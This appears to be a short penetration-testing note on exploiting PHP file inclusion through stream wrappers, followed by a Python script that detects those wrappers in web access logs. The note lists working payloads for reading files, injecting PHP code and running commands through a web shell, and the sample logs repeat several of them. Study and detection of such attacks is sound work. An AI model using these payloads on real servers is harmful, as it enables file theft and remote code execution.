PHP Wrappers File Inclusion
PHP wrappers can be used to exploit an LFI/RFI on a server as an alternative to path traversal or similar techniques.
To read a file (encoded as base64): php://filter/read=convert.base64-encode/resource=/path/to/file
To inject some code (encoded as base64):
- data://text/plain;base64,<base64 php code here>
- allow_url_include must be enabled
To inject some code (as POST data), inject php://input and use:
$ curl -s -X POST --data '<?php /* code */ ?>' [...]
We can also use some special wrappers:
- expect://id: run the id command; not often installed.
- zip://./path/to/shell.zip%23shell.php&cmd=id: if enabled, we can load a shell inside a zip (.zip extension not mandatory).
- phar://./path/to/shell.phar%2Fshell.php&cmd=id: if enabled, we can load a shell inside a zip (.phar extension not mandatory).
Refer to payloads to generate phar archives or to write PHP code.
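
A detection-side view of the wrappers listed above, as an added example that is not part of the original notes: it scans web access-log lines for query parameters whose value carries one of these schemes, including nested percent-encoding. The combined log format, the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Wrapper schemes listed in these notes. PHP resolves scheme names
# case-insensitively, and data: is also accepted without the "//".
WRAPPER_RE = re.compile(
    r"\b(php|expect|zip|phar)://|\b(data):(?://)?[\w.+/-]*[;,]", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (hypothetical host, paths and parameter names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page='
    'php://filter/read=convert.base64-encode/resource=/path/to/file HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page='
    'zip://./path/to/shell.zip%23shell.php&cmd=id HTTP/1.1" 200 64',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "POST /index.php?page='
    '%2570hp%253A%252F%252Finput HTTP/1.1" 200 12',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?page='
    'about&ref=https://example.com/ HTTP/1.1" 200 2048',
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2570hp) with a bounded loop."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_wrappers(log_line):
    """Return sorted (parameter, scheme) pairs whose value carries a wrapper."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = set()
    for pair in urlsplit(match.group(1)).query.split("&"):
        name, _, value = pair.partition("=")
        found = WRAPPER_RE.search(fully_decode(value))
        if found:
            hits.add((name, (found.group(1) or found.group(2)).lower()))
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(find_wrappers(line), line.split('"')[1])
```

A php://input request only shows the wrapper name in the query string; the injected code travels in the POST body, which access logs normally do not record.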